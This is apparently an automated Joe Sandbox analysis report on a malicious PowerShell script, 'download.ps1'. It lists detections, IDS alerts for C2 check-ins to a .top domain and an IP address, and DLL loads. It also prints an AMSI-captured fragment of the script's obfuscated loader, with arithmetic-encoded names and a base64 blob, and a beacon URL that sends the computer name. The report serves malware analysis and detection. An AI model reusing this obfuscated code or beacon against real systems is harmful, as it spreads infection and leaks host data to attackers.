Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1581377
MD5:4b6d9a93fec91f40e96d5a5640545349
SHA1:17bacbf0e331703514280b7f53d2d2da05385321
SHA256:441f1bb67c8147a05d2624d68cb631280783aed18c867f7ae42bc86520a79670
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 4308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4308, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4308, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T14:39:09.846752+010020577411A Network Trojan was detected192.168.11.204975945.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T14:39:07.851293+010028594051Domain Observed Used for C2 Detected192.168.11.20556841.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T14:39:09.846752+010018100001Potentially Bad Traffic192.168.11.204975945.61.136.13880TCP
2024-12-27T14:39:10.447985+010018100001Potentially Bad Traffic192.168.11.2049760142.250.65.19680TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://gajaechkfhfghal.topAvira URL Cloud: Label: malware
Source: download.ps1Virustotal: Detection: 9%Perma Link
Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.137016391574.000001CF29DC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb7u source: powershell.exe, 00000000.00000002.137052660360.000001CF441A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137049725010.000001CF43E3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.137052660360.000001CF441CF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.137053533993.000001CF444F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbgStrings source: powershell.exe, 00000000.00000002.137051162289.000001CF440D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137053533993.000001CF444F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137052660360.000001CF441A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137016391574.000001CF29DC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbP source: powershell.exe, 00000000.00000002.137051162289.000001CF4413C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?lib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.137051162289.000001CF440D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32X source: powershell.exe, 00000000.00000002.137016391574.000001CF29DC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdby|001.8Mod source: powershell.exe, 00000000.00000002.137053533993.000001CF444F6000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49759 -> 45.61.136.138:80
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49760 -> 142.250.65.196:80
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49759 -> 45.61.136.138:80
Source: Network trafficSuricata IDS: 2859405 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:55684 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfqEGz8Sof0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=cEoIAxjMoZ6MoW68jg49qCvrRMa0ViSx6xN20jBzhJeiEz3tcizlILgzAcNWZYjCzEeOfczwUdLkmSnraGstbyPWvKRY4BLH6ZxyeYSuz-t1QxzbHSKelk9W2dJ3fRsRHkE98yh2r97s7ODfTI2YXocag3sXOqL8kezGUaPUsHBEfBoGbcxKg7NugFxmHmacy3uh
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfqEGz8Sof0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=cEoIAxjMoZ6MoW68jg49qCvrRMa0ViSx6xN20jBzhJeiEz3tcizlILgzAcNWZYjCzEeOfczwUdLkmSnraGstbyPWvKRY4BLH6ZxyeYSuz-t1QxzbHSKelk9W2dJ3fRsRHkE98yh2r97s7ODfTI2YXocag3sXOqL8kezGUaPUsHBEfBoGbcxKg7NugFxmHmacy3uh
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfqEGz8Sof0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=cEoIAxjMoZ6MoW68jg49qCvrRMa0ViSx6xN20jBzhJeiEz3tcizlILgzAcNWZYjCzEeOfczwUdLkmSnraGstbyPWvKRY4BLH6ZxyeYSuz-t1QxzbHSKelk9W2dJ3fRsRHkE98yh2r97s7ODfTI2YXocag3sXOqL8kezGUaPUsHBEfBoGbcxKg7NugFxmHmacy3uh
Source: global trafficDNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2D0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$jm9lqy6w1pihvt8/$6lmkrt5pui8sed3.php?
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$jm9lqy6w1pihvt8/$6lmkrt5pui8sed3.php?id=$env:computername&key=$ihwdqrvefno&s=527
Source: powershell.exe, 00000000.00000002.137049725010.000001CF43E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.137049725010.000001CF43E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.137050940017.000001CF43F10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr)
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CEA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527p
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BCE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2D260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CF42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfq
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvG
Source: powershell.exe, 00000000.00000002.137049725010.000001CF43E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BCE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2DEFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.137049725010.000001CF43E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2CF42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137017490133.000001CF2CF54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: classification engineClassification label: mal80.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulvodwaz.gho.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $byjaog1hx3pi5uz.(([system.String]::new(@((474896/7088),(-2720+(393509/139)),(10201-10089),(1238435/(849505/(-2478+(7296289/2849)))),(-6633+(-849+7566)),(901-(6387940/(3009+(10729-5652))))))))( $zx9t1mu8fpeg67s ) $byjaog1hx3pi5uz.((-join (@((23450/(-5688+(-930+6968))),(109512/(6924606/6829)),(-1933+2044),(-5232+5347),(-4390+4491))| ForEach-Object { [char]$_ })))()$9sx3bywr4jlhq85.((-join (@((6874-6807),(-1173+1281),(3344-(10846-(9554315/1255))),(-4493+(42425856/(10551-(7439-6095)))),(272902/(7961-5259)))| ForEach-Object { [char]$_ })))()[byte[]] $icvgeypqar70438 = $zx9t1mu8fpeg67s.(([char[]]@((1286-1202),(4496-(14220555/3243)),(-6339+6404),(8874-8760),(-2120+2234),(104663/1079),(932184/7704)) -join ''))() $8u1xpshejf069z5=$icvgeypqar70438 return $8u1xpshejf069z5}[System.Text.Encoding]::ascii.((-join (@((515957/(51617501/(62506400/(16776-(19820360/(-5408+7893)))))),(509343/(792+4251)),(-2856+(9937-(40501475/5815))),(-7969+(39575580/(4761+154))),(2511-2395),(-479+593),(391440/(6011-2283)),(-8208+(17689-(12525-(585+2569)))),(649312/6304))| ForEach-Object { [char]$_ })))((dx36iuwaqersg5yt2oj8k4vpcml "Jug9NGF0enZ2N5utZAwpYxPy1VWyyFdRCdgGXdSOBgkqF4TxH/ie2GOt8SpqcXb4GugjcSugMuClwUn+yrXclUj9yFNW6fP7I22Oe/4njwgmYtkmzt2Fy/0IDQeH39rTkp7Q5yYjFcgJxcTN25dRyxeLgoOTy9zDyLbQVZ6CioaWx+vUx4bw57KZBZp9xEmPwZDgx3bbdY2ZiCn/N8xq2X8Ylc6+tNvmlh1JQblLBYaF9MPI3BTqSJShn4j12qmH4vtP+Rj9S4yvytstWgvmApSiHenB6MdoUlrxhrWYeAn5kuBIApit/vXOdYw0GPvCtI1n1w5Bvc8WSoHJpzBtgqiRrBUZ/ODm4SFfWrjyoK2eSu3cTeaMzLPTaOyRGP/Er5u/Q0/MA63JGMUHrqVIicr1RQQ56Y0przFI6YyyTwS/WuiXY18Cwds3Vtvlj1pK0QLr4vmMw4G3jtQLrgywuxoZBwHO82pMSTA4aJVKpZqvGuhEBMLWn8yD2pnDrrmupz5KyaxDlil4G4EesExeOViguqQhe+OWWSwpSIVVMJnITsFitBKIaW4YL4G7QQjUIcWYG+TZFwj7bt1TLE6Q/lOsDJsffkufABbu6TWSmLDLxh1f4/X1lSWTli8OP0jrz4nH6APBtfRZsqvEJftbayISH68DobN0roPuICpdGVkOEyRLdl3RcXokHDS3XNOqwJiex6q5ZYnK7LhOGvMD71jwII7/b+/XALfZE1ej98Ub8vmIn8HuUvxevaaga3yHvPbfIFXJo/vBfKU/k9NQEdSgJ1D4S0QUfk4B0aE7EOjKVAyvZEITfjqsTM06FJSWr9GG3EtFNdM0MpNGvIQTbjqnJU/vCzEzbdhuCZYqEMGtfR90QvOhk4uyE7o2Q6/pfx6UMv/0epqEtCLKnZBEqCjDvu8LqZA22LdM1DlXtetAIO43e/dKXSp9EwvwqAFOgNnLw9KzNZHNCsxPxpuFzQgXG4C//sldR4LSa70Pj7WL1sfi1KrUzpQKjaVlwMjYnkAhWIeJsfsPyf3XnvDGk14IgYSI+sj43LZBjrgaI1Szon891z8HOzg3q1ikJ0QWBqvPpsaq8BPRYSpMks/78y9ERqpOjeiuBBiNzYT3ARjFBC0DTuFK7uNgG7yvguuNtNpRNttZTyCX4GvaM80PRELBrOXZM3V9giY8YSLYvioamzyxG0y3mY1DbASA09rT7P56a3t9azQDjqQ7suOR+L3hWezFFsMJyNPaCUSLRw+A29TBRZzW77LZm5oNCAlu9gbGbZlOjWb7UTgOOl/ZQcjNNaOVWWdqUsyVuKTjqK31jpCvFVgW3CU6cPRRqAGTTeeQ3/QAktbVEKbwowUN6eo/uMMwifqE3AcCvFsWaLYitZZiqfFZ9sPk+qS81FGTZ5iBNsjbH7jWvpO/MhZXbTsmdCqoGr8kEvK3FRkbUVAMUzUDEVnS4mdI6IMwwWRKHX+ifJ0v0AJvgkG4CbtzrEYPOEJwtTW62XQKgXHg39pKRfeRHkGaJ0qmZeAC00ooHfe/hEzxMgQljDFFOwKMkdAfoFjSpzZBFBHW6Goldqaq2qRHPyfgASJyvZUwrSzF5OHL+TdgPEpL9z6dOVqOfFFzwX5CH/I+uK5b7XoIvpj4KMLhgiGJgodw+A+OfR8Q+z8LMmHawgfccxHK5R+GP2lPITuQhOSX3bC9l2Hb+OcCnLZGKIws92HtyXSxFVeVITQ8qibr24NCgq6DVFLhFdPGZcYhJF7d/oVya4Dx6lqIa0K4HBHFPdv+NH5lvxfZH/agcUAURY/gGkKsig696qyYG8MnN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 9%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
